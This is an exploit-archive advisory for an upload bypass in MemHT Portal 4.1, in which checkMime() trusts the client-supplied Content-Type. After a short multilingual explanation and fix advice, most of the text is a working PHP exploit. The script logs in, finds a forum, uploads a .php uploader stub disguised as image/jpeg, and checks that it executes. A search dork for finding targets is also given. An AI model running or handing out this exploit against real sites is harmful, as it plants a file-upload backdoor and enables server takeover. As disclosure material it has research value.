MemHT Portal <= 4.1 Upload ByPass Vulnerabilities
Posted on 17 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MemHT Portal <= 4.1 Upload ByPass Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================= MemHT Portal <= 4.1 Upload ByPass Vulnerabilities ================================================= +-------------------------------------------------------------------------------------------------------------------------------+ | _______ __ ______ | | | | |.--.--.| |--..-----. | |.----..-----..--.--.--. | | | || | || < | -__| | ---|| _|| -__|| | | | | | |__|____||_____||__|__||_____| |______||__| |_____||________| | +-------------------------------------------------------------------------------------------------------------------------------+ | Name: MemHT Portal <= 4.1 Upload ByPass | | Software: MemHT Portal <= 4.1 | | Site: http://www.memht.com | | Download: http://www.memht.com/index.php?page=release&download=full | | Vulnerability: Upload ByPass | | Severity: high ( low / medium / high ) | | Tested on: 4.1 | | Dork: "MemHT Portal" | +-------------------------------------------------------------------------------------------------------------------------------+ | Author: Lord-Anubis | | Contact: lord.anu bis4[at]gm ail[dot]com | | Date: 16.06.2010 ( dd.mm.yyyy ) | | Site: http://lordanubis.altervista.org/ | +-------------------------------------------------------------------------------------------------------------------------------+ | Bug File: inc/class/uploadFile.class.php | | 217. function checkMime() { | | 218. if (sizeof($this->mime) AND !@in_array($this->FILES[$this->field]['type'],$this->mime)) { | | 219. $this->error = _ERROR_FILENOTPERMITTED_; | | 220. } | | 221. 
} | +-------------------------------------------------------------------------------------------------------------------------------+ | Bug Explanation: | | - EN: In inc/class/uploadFile.class.php the upload type check (checkMime(), quoted above) only tests whether the | | "Content-Type" the client declares for the multipart part is present in the $this->mime array. That header is | | set by the sender and is therefore attacker-controlled, so a .php attachment is accepted simply by sending | | "Content-Type: image/jpeg"; the proof of concept below stores it as pages/forum/attachment/<name>.php and | | requests it back. Posting a thread requires a valid portal account, so this is a post-authentication issue. | | A correct check validates the extension against an allow-list, determines the type server-side from the file | | contents, and stores uploads outside the document root or in a location where execution is disabled. | | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | | - ITA: Nel file inc/class/uploadFile.class.php il controllo sul tipo di file caricato avviene verificando se il | | "Content-Type" inviato tramite header è presente nell'array $this->mime. E' quindi possibile effettuare | | l'upload di un file PHP inviando, semplicemente, l'header "Content-Type: image/jpeg ". | | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | | - PL: W pliku inc/class/uploadFile.class.php kontrol nad typem wniesionego file przeprowadza sie sprawdzajac | | "Content-Type" przeslany przez header znajduje sie w array $this->mime. Jest mozliwe przeprowadzic upload file | | PHP, wprowadzajac po prostu header "Content-Type: image/jpeg ". 
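<?php
/**
 * exploit.php -- proof of concept for the MemHT Portal <= 4.1 upload bypass.
 *
 * Software:      MemHT Portal <= 4.1
 * Author:        Lord-Anubis <lord.anu bis4[at]gm ail[dot]com>
 * Vulnerability: Upload ByPass (inc/class/uploadFile.class.php, checkMime())
 *
 * How it works: checkMime() only compares the client-declared Content-Type of
 * the multipart part with $this->mime, so a forum attachment named
 * <random>.php is accepted when the part is labelled "image/jpeg". The script
 * logs in with the supplied credentials, finds the first viewable forum,
 * posts a thread whose attachment is a small PHP uploader, and then requests
 * that attachment back from pages/forum/attachment/.
 *
 * Use only against systems you are authorised to test. Valid portal
 * credentials are required: the upload is a post-authentication action.
 *
 * NOTE(review): the published listing lost its string escapes (the CRLF
 * terminators of the HTTP requests, the quotes inside phpCode(), the
 * escaped quotes in the forum_legend pattern); they are restored here.
 * Changes to the original logic: the login request now closes the
 * connection instead of waiting for the socket timeout, credentials are
 * URL-encoded, the cookie/session captures are checked before use, and the
 * final check distinguishes "executed" from "served as source".
 */

// Notices from file_get_contents() on probed forum ids would otherwise
// clutter the output; all real failures are reported explicitly below.
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

/**
 * Send one raw HTTP request to $hostName:80 and return the whole response
 * (status line, headers and body) as a string.
 *
 * Reads the global $hostName taken from argv. Exits the script when the
 * connection cannot be opened.
 *
 * @param string $packet complete request: CRLF-terminated headers, blank line, body
 * @return string raw response, "" when the server sent nothing
 */
function sendPacket($packet) {
    global $hostName;
    $errno = 0;
    $errstr = '';
    $sock = fsockopen(gethostbyname($hostName), 80, $errno, $errstr);
    if (!$sock) {
        exit("[-] No response from '{$hostName}' ({$errno}: {$errstr})\n");
    }
    fputs($sock, $packet);
    // Every request sent by this script carries "Connection: Close", so
    // reading to EOF returns as soon as the server is done.
    $response = stream_get_contents($sock);
    fclose($sock);
    return $response === false ? '' : $response;
}

/**
 * Return a string of 15 pseudo-random decimal digits.
 *
 * Used for the multipart boundary and the attachment file name; the values
 * only need to avoid collisions, not be unpredictable, so rand() suffices.
 *
 * @return string
 */
function randomNum() {
    $digits = '';
    for ($i = 0; $i < 15; $i++) {
        $digits .= rand(0, 9);
    }
    return $digits;
}

/**
 * Content of the attachment that gets uploaded: a minimal HTML form plus a
 * PHP stub that moves any file POSTed to it into its own directory.
 *
 * The literal "Error uploading. ( by Lord-Anubis )" is the marker the main
 * script looks for when it fetches the attachment back: a plain GET carries
 * no $_FILES entry, so an executing stub takes the else branch and prints it.
 *
 * @return string PHP source
 */
function phpCode() {
    return "<form method=\"post\" action=\"<?php echo \"?\$_SERVER[QUERY_STRING]\"; ?>\" enctype=\"multipart/form-data\">"
         . "<input type=\"file\" name=\"upload\" /><input type=\"submit\" name=\"submit\" value=\"submit\" /></form>"
         . "<?php error_reporting(0); set_time_limit(0); \$link = dirname(__FILE__) . DIRECTORY_SEPARATOR . \$_FILES['upload']['name']; "
         . "if (move_uploaded_file(\$_FILES['upload']['tmp_name'], \$link)) { echo \$link; chmod(\$link, 0666); } else { echo \"Error uploading. ( by Lord-Anubis )\"; } ?>";
}

if ($argc != 5) {
    exit(
        "[+] Software: MemHT Portal <= 4.1\n" .
        "[+] Author: Lord-Anubis\n" .
        "[+] Vulnerability: Upload ByPass\n" .
        "[+] Usage: ./exploit [hostName] [path] [userName] [passWord]\n" .
        "[+] Example:\n" .
        "[+] ./exploit 127.0.0.1 / anubis password\n" .
        "[+] ./exploit hostname.com /wowbb/ mark s3cret\n"
    );
}

list($cli, $hostName, $path, $userName, $passWord) = $argv;

// Normalise the application path to the form "/.../" so it can be spliced
// directly into request URLs.
if (substr($path, 0, 1) != "/") {
    $path = "/$path";
}
if (substr($path, -1) != "/") {
    $path = "$path/";
}

// Step 1: log in. The portal answers with Set-Cookie headers for the PHP
// session (PHPSESSID) and the user cookie (login_user); a failed login sets
// login_user to "deleted".
$postData = "post_username=" . urlencode($userName)
          . "&post_password=" . urlencode($passWord)
          . "&Submit=Login&login=true";
$packet  = "POST http://{$hostName}{$path}index.php?page=users HTTP/1.1\r\n";
$packet .= "Host: {$hostName}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: " . strlen($postData) . "\r\n";
$packet .= "Referer: http://{$hostName}{$path}\r\n";
// Without this an HTTP/1.1 server keeps the socket open and the read in
// sendPacket() only returns after default_socket_timeout.
$packet .= "Connection: Close\r\n";
$packet .= "\r\n";
$packet .= $postData;
$return = sendPacket($packet);

$cookie  = '';
$session = '';
if (preg_match('/login_user=(.*?);/is', $return, $match)) {
    $cookie = $match[1];
}
if (preg_match('/PHPSESSID=(.*?);/is', $return, $match)) {
    $session = $match[1];
}
if ($cookie === 'deleted') {
    echo("[-] UserName or Password is invalid\n");
    echo("[-] Exploit failed\n");
    exit;
}
if ($cookie === '' || $session === '') {
    // Not fatal in the original either, but the thread post below needs both.
    echo("[!] Login response carried no login_user/PHPSESSID cookie; continuing anyway\n");
}

// Step 2: find the first forum id that renders as a forum (its page contains
// class='forum_legend'). Ids 1..100 are probed unauthenticated, as in the
// original.
$fid = 0;
for ($id = 1; $id <= 100; $id++) {
    $page = file_get_contents("http://{$hostName}{$path}index.php?page=forum&op=viewForum&id={$id}");
    if ($page !== false && preg_match('/class=\'forum_legend\'/is', $page)) {
        $fid = $id;
        break;
    }
}
if ($fid === 0) {
    echo("[-] Forum is disabled\n");
    echo("[-] Exploit failed\n");
    exit;
}

// Step 3: post a new thread whose attachment is the PHP stub. The part is
// given a .php file name and the image/jpeg label that checkMime() accepts.
$boundary = randomNum();
$fileName = randomNum();

$postArray = array(
    "name"         => "Hello Wolrd!!!",
    "text"         => "My name is Mark, i'm from 23 years old and i'm from US.",
    "tags"         => "",
    "attachment"   => phpCode(),
    "smiles"       => "1",
    "notification" => "0",
    "Send"         => "Send",
    "ok"           => "true",
);

// RFC 2046: the boundary named in the Content-Type header is prefixed with
// "--" in the body, and the final delimiter is suffixed with "--".
$boundaryValue = str_repeat('-', 27) . $boundary;
$delimiter     = "--" . $boundaryValue;

$postData = "";
foreach ($postArray as $key => $value) {
    $postData .= "{$delimiter}\r\n";
    $postData .= "Content-Disposition: form-data; name=\"{$key}\"";
    if ($key === 'attachment') {
        $postData .= "; filename=\"{$fileName}.php\"\r\n";
        $postData .= "Content-Type: image/jpeg\r\n";
    } else {
        $postData .= "\r\n";
    }
    $postData .= "\r\n";
    $postData .= "{$value}\r\n";
}
$postData .= "{$delimiter}--\r\n";

$packet  = "POST http://{$hostName}{$path}index.php?page=forum&op=newThread&id={$fid} HTTP/1.1\r\n";
$packet .= "Host: {$hostName}\r\n";
$packet .= "Accept: image/gif, image/pjpeg, image/jpeg, image/png, image/tiff, image/bmp */*\r\n";
$packet .= "Referer: http://{$hostName}{$path}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary={$boundaryValue}\r\n";
$packet .= "Content-Length: " . strlen($postData) . "\r\n";
$packet .= "Cookie: PHPSESSID={$session}; login_user={$cookie};\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "\r\n";
$packet .= $postData;
sendPacket($packet);

// Step 4: request the attachment back. The marker string also occurs in the
// stub's own source, so its presence alone does not prove execution; a PHP
// open tag in the response means the file was stored but served verbatim.
$url  = "http://{$hostName}{$path}pages/forum/attachment/{$fileName}.php";
$body = file_get_contents($url);
if ($body === false || !preg_match('/Lord-Anubis/is', $body)) {
    echo("[-] Attachment not found\n");
    echo("[-] Exploit failed\n");
    exit;
}
if (strpos($body, '<?php') !== false) {
    echo("[-] Attachment stored but served as source, not executed: {$url}\n");
    echo("[-] Exploit failed\n");
    exit;
}

echo("[+] {$url}\n");
echo("[+] Exploit successful\n");
exit;

// Source: Inj3ct0r.com [2010-06-17]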